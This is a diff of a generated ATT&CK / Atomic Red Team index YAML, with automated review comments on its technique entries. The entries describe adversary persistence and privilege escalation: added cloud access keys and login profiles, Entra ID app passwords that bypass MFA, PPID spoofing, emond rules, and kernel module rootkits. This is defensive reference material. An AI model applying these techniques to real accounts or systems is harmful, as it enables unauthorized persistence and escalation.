account to maintain persistent access to victim accounts and instances within
the environment.\n\nFor example, adversaries may add credentials for Service
Principals and Applications in addition to existing legitimate credentials
- in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
- Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
- both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
- With sufficient permissions, there are a variety of ways to add credentials
- including the Azure Portal, Azure command line interface, and Azure or Az
- PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+ in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+ Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+ include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+ Guidance) With sufficient permissions, there are a variety of ways to add
+ credentials including the Azure Portal, Azure command line interface, and
+ Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
infrastructure-as-a-service (IaaS) environments, after gaining access through
[Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
may generate or import their own SSH keys using either the CreateKeyPair
@@ -22260,11 +22555,15 @@ privilege-escalation:
usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
Expel Behind the Scenes)\n\nAdversaries may also use the CreateAccessKey
API in AWS or the gcloud iam service-accounts keys create
command
- in GCP to add access keys to an account. If the target account has different
- permissions from the requesting account, the adversary may also be able to
- escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+ in GCP to add access keys to an account. Alternatively, they may use the CreateLoginProfile
+ API in AWS to add a password that can be used to log into the AWS Management
+ Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+ Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+ If the target account has different permissions from the requesting account,
+ the adversary may also be able to escalate their privileges in the environment
+ (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
- 2.0) For example, in Azure AD environments, an adversary with the Application
+ 2.0) For example, in Entra ID environments, an adversary with the Application
Administrator role can add a new set of credentials to their application's
service principal. In doing so the adversary would be able to access the service
principal’s roles and permissions, which may be different from those of the
@@ -22275,12 +22574,19 @@ privilege-escalation:
tied to the permissions of the original user account. These temporary credentials
may remain valid for the duration of their lifetime even if the original account’s
API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
- Persistence)"
+ Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+ adversaries may be able to add an app password to a user account.(Citation:
+ Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+ legacy devices that do not support multi-factor authentication (MFA), adding
+ an app password can allow an adversary to bypass MFA requirements. Additionally,
+ app passwords may remain valid even if the user’s primary password is reset.(Citation:
+ Microsoft Entra ID App Passwords)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Expel
- Oleg Kolesnikov, Securonix
@@ -22289,6 +22595,7 @@ privilege-escalation:
- Alex Soler, AttackIQ
- Dylan Silva, AWS Security
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
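Review bot: the T1098.001 description now adds two new credential paths, `CreateLoginProfile` in AWS and Entra ID app passwords, but `x_mitre_detection` here still only covers Service Principal/Application modifications and SSH key APIs. If the detection text is also synced from upstream this is an upstream gap rather than a problem with the diff, but it is worth flagging: `CreateLoginProfile` calls and app-password enrollment events are exactly the kind of thing a defender reading this entry would expect to find under detection, and the newly added `Active Directory: Active Directory Object Creation/Modification` data sources do not cover the AWS case.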
@@ -22297,13 +22604,16 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- - Azure AD
- SaaS
- x_mitre_version: '2.7'
+ - Identity Provider
+ x_mitre_version: '2.8'
x_mitre_data_sources:
- 'User Account: User Account Modification'
+ - 'Active Directory: Active Directory Object Creation'
+ - 'Active Directory: Active Directory Object Modification'
type: attack-pattern
id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
created: '2020-01-19T16:10:15.008Z'
@@ -22329,10 +22639,18 @@ privilege-escalation:
description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
Principals. Retrieved January 19, 2020.
url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+ - source_name: Lacework AI Resource Hijacking 2024
+ description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+ June 6). Lacework Labs. Retrieved July 1, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
- source_name: GCP SSH Key Add
description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
October 1, 2020.
url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
- source_name: Blue Cloud of Death Video
description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
Azure. Retrieved November 21, 2019.'
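Review bot: the new "Lacework AI Resource Hijacking 2024" reference puts the title first ("Detecting AI resource-hijacking with Composite Alerts. (2024, June 6). Lacework Labs.") whereas every other entry in this list follows the "Author. (date). Title." order, for example the adjacent "Permiso Scattered Spider 2023" and "GCP SSH Key Add" entries. If the description string is copied verbatim from upstream this is cosmetic, but if it is generated locally, "Lacework Labs. (2024, June 6). Detecting AI resource-hijacking with Composite Alerts." would match the rest of the file.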
@@ -22341,10 +22659,20 @@ privilege-escalation:
description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
Azure. Retrieved October 23, 2019.'
url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+ - source_name: Microsoft Entra ID App Passwords
+ description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+ authentication with legacy applications using app passwords. Retrieved May
+ 28, 2024.
+ url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+ - source_name: Mandiant APT42 Operations 2024
+ description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+ Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+ Retrieved May 28, 2024.'
+ url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
- source_name: Expel Behind the Scenes
description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -22361,9 +22689,6 @@ privilege-escalation:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.001
atomic_tests: []
T1134.003:
@@ -22427,7 +22752,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.003:
technique:
@@ -22516,7 +22840,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.003
atomic_tests: []
T1134.004:
@@ -22574,7 +22897,7 @@ privilege-escalation:
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe
rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe
), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-03T02:15:42.360Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Access Token Manipulation: Parent PID Spoofing'
x_mitre_detection: |-
@@ -22599,12 +22922,11 @@ privilege-escalation:
- Host Forensic Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.004
atomic_tests: []
T1546.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:27:11.065Z'
name: 'Event Triggered Execution: Change Default File Association'
description: "Adversaries may establish persistence by executing malicious content
triggered by a file type association. When a file is opened, the default program
@@ -22630,7 +22952,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Stefan Kanthak
@@ -22644,7 +22965,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -22671,8 +22991,8 @@ privilege-escalation:
url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
- source_name: Microsoft File Handlers
description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
- Retrieved November 13, 2014.
- url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+ Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
- source_name: Microsoft Assoc Oct 2017
description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
7, 2018.
@@ -22683,7 +23003,8 @@ privilege-escalation:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.001
atomic_tests: []
T1055.014:
@@ -22754,7 +23075,7 @@ privilege-escalation:
resources, and possibly elevated privileges. Execution via VDSO hijacking
may also evade detection from security products since the execution is masked
under a legitimate process. "
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-07T17:09:09.048Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: VDSO Hijacking
x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -22781,7 +23102,6 @@ privilege-escalation:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.014:
technique:
@@ -22821,7 +23141,7 @@ privilege-escalation:
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients
, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist
.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T00:16:01.732Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Emond'
x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -22841,7 +23161,6 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.014
atomic_tests:
- name: Persistance with Event Monitor - emond
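Review bot: the atomic test name in the trailing context, 'Persistance with Event Monitor - emond', is misspelled (Persistence). This hunk only removes spec_version: '2.1' from T1546.014, and since this index is generated, the fix belongs in the T1546.014 atomic YAML that feeds it rather than in this file; worth a follow-up so the next regeneration picks it up.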
@@ -22868,7 +23187,7 @@ privilege-escalation:
elevation_required: true
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -22922,11 +23241,10 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547.001:
technique:
- modified: '2023-10-16T09:08:22.319Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
description: |-
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -23013,9 +23331,9 @@ privilege-escalation:
in the Registry. Retrieved August 3, 2020.
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Oddvar Moe RunOnceEx Mar 2018
description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
from Autoruns.exe. Retrieved June 29, 2018.
@@ -23028,12 +23346,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.001
atomic_tests: []
T1098:
technique:
- modified: '2024-01-16T22:24:38.234Z'
+ modified: '2024-10-15T15:35:57.382Z'
name: Account Manipulation
description: "Adversaries may manipulate accounts to maintain and/or elevate
access to victim systems. Account manipulation may consist of any action that
@@ -23069,16 +23386,15 @@ privilege-escalation:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- SaaS
- Network
- Containers
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
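Review bot: the platform list for T1098 replaces Azure AD, Office 365 and Google Workspace with Office Suite and Identity Provider (version 2.6 to 2.7). Anything downstream that selects techniques by the old platform names (platform-specific indexes, filters, test matrices) will silently stop matching this technique; check that those consumers are updated for the new names in the same change, otherwise the old-name views go stale without any error.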
@@ -23119,143 +23435,141 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098
atomic_tests: []
T1547.006:
technique:
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-12T17:30:54.170Z'
+ name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+ description: |-
+ Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
+
+ When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+ Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+ Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+ Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
x_mitre_contributors:
- Wayne Silva, F-Secure Countercept
- Anastasios Pingios
- Jeremy Galloway
- Red Canary
- Eric Kaiser @ideologysec
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: |
+ Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+ Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
+
+ On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'File: File Creation'
+ - 'File: File Modification'
+ - 'Kernel: Kernel Module Load'
+ - 'Process: Process Creation'
+ x_mitre_permissions_required:
+ - root
type: attack-pattern
id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
created: '2020-01-24T17:42:23.339Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1547.006
url: https://attack.mitre.org/techniques/T1547/006
+ external_id: T1547.006
- source_name: Apple Developer Configuration Profile
- url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
September 23, 2021.
+ url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
- source_name: Apple Kernel Extension Deprecation
- url: https://developer.apple.com/support/kernel-extensions/
description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
Alternatives. Retrieved November 4, 2020.
+ url: https://developer.apple.com/support/kernel-extensions/
- source_name: System and kernel extensions in macOS
- url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
March 31, 2022.
+ url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
- source_name: GitHub Reptile
- url: https://github.com/f0rb1dd3n/Reptile
description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
April 9, 2018.
+ url: https://github.com/f0rb1dd3n/Reptile
- source_name: Volatility Phalanx2
- url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+ url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
- source_name: iDefense Rootkit Overview
- url: http://www.megasecurity.org/papers/Rootkits.pdf
description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
- April 6, 2018.
+ September 12, 2024.
+ url: https://www.megasecurity.org/papers/Rootkits.pdf
- source_name: Linux Loadable Kernel Module Insert and Remove LKMs
- url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
description: Henderson, B. (2006, September 24). How To Insert And Remove
LKMs. Retrieved April 9, 2018.
+ url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
- source_name: CrowdStrike Linux Rootkit
- url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
Retrieved December 21, 2017.
+ url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
- source_name: GitHub Diamorphine
- url: https://github.com/m0nad/Diamorphine
description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+ url: https://github.com/m0nad/Diamorphine
- source_name: Securelist Ventir
- url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
your MacOS spy. Retrieved April 6, 2018.'
+ url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
- source_name: User Approved Kernel Extension Pike’s
- url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
Loading…. Retrieved September 23, 2021.
+ url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
- source_name: Linux Kernel Module Programming Guide
- url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
Retrieved April 6, 2018.
+ url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
- source_name: Linux Kernel Programming
- url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
Module Programming Guide. Retrieved April 6, 2018.
+ url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
- source_name: Trend Micro Skidmap
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
Retrieved June 4, 2020.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
- source_name: Purves Kextpocalypse 2
- url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
. Retrieved September 23, 2021.
+ url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
- source_name: RSAC 2015 San Francisco Patrick Wardle
- url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
Retrieved April 6, 2018.
+ url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- source_name: Synack Secure Kernel Extension Broken
- url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
Extension Loading’ is Broken. Retrieved April 6, 2018.
+ url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
- source_name: Wikipedia Loadable Kernel Module
- url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
April 9, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
-
- When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
- Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
- Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
- Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
- x_mitre_detection: |
